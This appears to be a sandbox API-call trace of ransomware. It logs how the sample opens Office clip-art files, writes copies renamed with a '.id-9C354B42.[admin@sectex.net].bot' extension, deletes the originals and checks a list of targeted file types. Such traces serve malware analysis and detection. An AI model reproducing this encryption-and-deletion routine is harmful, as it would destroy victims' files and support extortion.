	[0152.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.631] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.631] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0152.632] GetLastError () returned 0x0
	[0152.632] ReadFile (in: hFile=0x3b0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1846, lpOverlapped=0x0) returned 1
	[0153.110] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1850, lpOverlapped=0x0) returned 1
	[0153.111] ReadFile (in: hFile=0x3b0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.111] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.111] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.111] CloseHandle (hObject=0x3dc) returned 1
	[0153.112] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.112] SetEndOfFile (hFile=0x3b0) returned 1
	[0153.114] CloseHandle (hObject=0x3b0) returned 1
	[0153.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.115] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf")) returned 1
	[0153.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.115] lstrlenW (lpString=".doc") returned 4
	[0153.115] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.115] lstrlenW (lpString=".docx") returned 5
	[0153.115] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0153.115] lstrlenW (lpString=".pdf") returned 4
	[0153.115] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.115] lstrlenW (lpString=".xls") returned 4
	[0153.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.116] lstrlenW (lpString=".xlsx") returned 5
	[0153.116] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0153.116] lstrlenW (lpString=".ppt") returned 4
	[0153.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.116] lstrlenW (lpString=".zip") returned 4
	[0153.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.116] lstrlenW (lpString=".rar") returned 4
	[0153.116] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString=".bz2") returned 4
	[0153.116] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString=".7z") returned 3
	[0153.116] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.116] lstrlenW (lpString=".dbf") returned 4
	[0153.116] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.116] lstrlenW (lpString=".1cd") returned 4
	[0153.116] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.116] lstrlenW (lpString=".jpg") returned 4
	[0153.116] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.116] lstrlenW (lpString=".doc") returned 4
	[0153.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.116] lstrlenW (lpString=".docx") returned 5
	[0153.116] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0153.117] lstrlenW (lpString=".pdf") returned 4
	[0153.117] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.117] lstrlenW (lpString=".xls") returned 4
	[0153.117] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.117] lstrlenW (lpString=".xlsx") returned 5
	[0153.117] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0153.117] lstrlenW (lpString=".ppt") returned 4
	[0153.117] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.117] lstrlenW (lpString=".zip") returned 4
	[0153.117] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.117] lstrlenW (lpString=".rar") returned 4
	[0153.117] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.117] lstrlenW (lpString=".bz2") returned 4
	[0153.117] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.117] lstrlenW (lpString=".7z") returned 3
	[0153.117] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.117] lstrlenW (lpString=".dbf") returned 4
	[0153.117] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.117] lstrlenW (lpString=".1cd") returned 4
	[0153.117] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF") returned 63
	[0153.117] lstrlenW (lpString=".jpg") returned 4
	[0153.117] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.117] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.118] lstrlenW (lpString="J0099179.WMF") returned 12
	[0153.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.286] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9154) returned 1
	[0153.286] CloseHandle (hObject=0x3d4) returned 1
	[0153.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf")) returned 0x20
	[0153.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0153.483] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.483] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0153.484] GetLastError () returned 0x0
	[0153.484] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x23c2, lpOverlapped=0x0) returned 1
	[0153.523] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x23d0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x23d0, lpOverlapped=0x0) returned 1
	[0153.523] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.524] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.524] SetEndOfFile (hFile=0x3b0) returned 1
	[0153.524] CloseHandle (hObject=0x3b0) returned 1
	[0153.524] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.524] SetEndOfFile (hFile=0x38c) returned 1
	[0153.526] CloseHandle (hObject=0x38c) returned 1
	[0153.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf")) returned 1
	[0153.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.553] lstrlenW (lpString=".doc") returned 4
	[0153.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.553] lstrlenW (lpString=".docx") returned 5
	[0153.553] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0153.553] lstrlenW (lpString=".pdf") returned 4
	[0153.553] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.553] lstrlenW (lpString=".xls") returned 4
	[0153.553] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.553] lstrlenW (lpString=".xlsx") returned 5
	[0153.553] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0153.553] lstrlenW (lpString=".ppt") returned 4
	[0153.553] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.554] lstrlenW (lpString=".zip") returned 4
	[0153.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.554] lstrlenW (lpString=".rar") returned 4
	[0153.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString=".bz2") returned 4
	[0153.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString=".7z") returned 3
	[0153.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.554] lstrlenW (lpString=".dbf") returned 4
	[0153.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.554] lstrlenW (lpString=".1cd") returned 4
	[0153.554] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.554] lstrlenW (lpString=".jpg") returned 4
	[0153.554] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.554] lstrlenW (lpString=".doc") returned 4
	[0153.554] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString=".docx") returned 5
	[0153.554] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0153.554] lstrlenW (lpString=".pdf") returned 4
	[0153.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.554] lstrlenW (lpString=".xls") returned 4
	[0153.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.554] lstrlenW (lpString=".xlsx") returned 5
	[0153.554] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0153.554] lstrlenW (lpString=".ppt") returned 4
	[0153.555] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.555] lstrlenW (lpString=".zip") returned 4
	[0153.555] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.555] lstrlenW (lpString=".rar") returned 4
	[0153.555] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.555] lstrlenW (lpString=".bz2") returned 4
	[0153.555] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.555] lstrlenW (lpString=".7z") returned 3
	[0153.555] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.555] lstrlenW (lpString=".dbf") returned 4
	[0153.555] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.555] lstrlenW (lpString=".1cd") returned 4
	[0153.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned 63
	[0153.555] lstrlenW (lpString=".jpg") returned 4
	[0153.555] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.555] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.555] lstrlenW (lpString="J0099184.WMF") returned 12
	[0153.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.557] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4118) returned 1
	[0153.557] CloseHandle (hObject=0x1b8) returned 1
	[0153.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf")) returned 0x20
	[0153.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0153.564] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.564] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0153.565] GetLastError () returned 0x0
	[0153.565] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1016, lpOverlapped=0x0) returned 1
	[0153.589] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1020, lpOverlapped=0x0) returned 1
	[0153.590] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.590] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.590] SetEndOfFile (hFile=0x3b0) returned 1
	[0153.590] CloseHandle (hObject=0x3b0) returned 1
	[0153.590] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.591] SetEndOfFile (hFile=0x38c) returned 1
	[0153.594] CloseHandle (hObject=0x38c) returned 1
	[0153.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.595] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099184.wmf")) returned 1
	[0153.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.595] lstrlenW (lpString=".doc") returned 4
	[0153.595] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString=".docx") returned 5
	[0153.596] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0153.596] lstrlenW (lpString=".pdf") returned 4
	[0153.596] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString=".xls") returned 4
	[0153.596] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.596] lstrlenW (lpString=".xlsx") returned 5
	[0153.596] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0153.596] lstrlenW (lpString=".ppt") returned 4
	[0153.596] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.596] lstrlenW (lpString=".zip") returned 4
	[0153.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.596] lstrlenW (lpString=".rar") returned 4
	[0153.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString=".bz2") returned 4
	[0153.596] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString=".7z") returned 3
	[0153.596] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.596] lstrlenW (lpString=".dbf") returned 4
	[0153.596] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.596] lstrlenW (lpString=".1cd") returned 4
	[0153.596] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.596] lstrlenW (lpString=".jpg") returned 4
	[0153.596] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.596] lstrlenW (lpString=".doc") returned 4
	[0153.597] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString=".docx") returned 5
	[0153.597] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0153.597] lstrlenW (lpString=".pdf") returned 4
	[0153.597] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString=".xls") returned 4
	[0153.597] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.597] lstrlenW (lpString=".xlsx") returned 5
	[0153.597] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0153.597] lstrlenW (lpString=".ppt") returned 4
	[0153.597] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.597] lstrlenW (lpString=".zip") returned 4
	[0153.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.597] lstrlenW (lpString=".rar") returned 4
	[0153.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString=".bz2") returned 4
	[0153.597] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString=".7z") returned 3
	[0153.597] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.597] lstrlenW (lpString=".dbf") returned 4
	[0153.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.597] lstrlenW (lpString=".1cd") returned 4
	[0153.597] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 63
	[0153.597] lstrlenW (lpString=".jpg") returned 4
	[0153.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.598] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.598] lstrlenW (lpString="J0099185.JPG") returned 12
	[0153.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0153.598] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3282) returned 1
	[0153.598] CloseHandle (hObject=0x38c) returned 1
	[0153.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg")) returned 0x20
	[0153.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
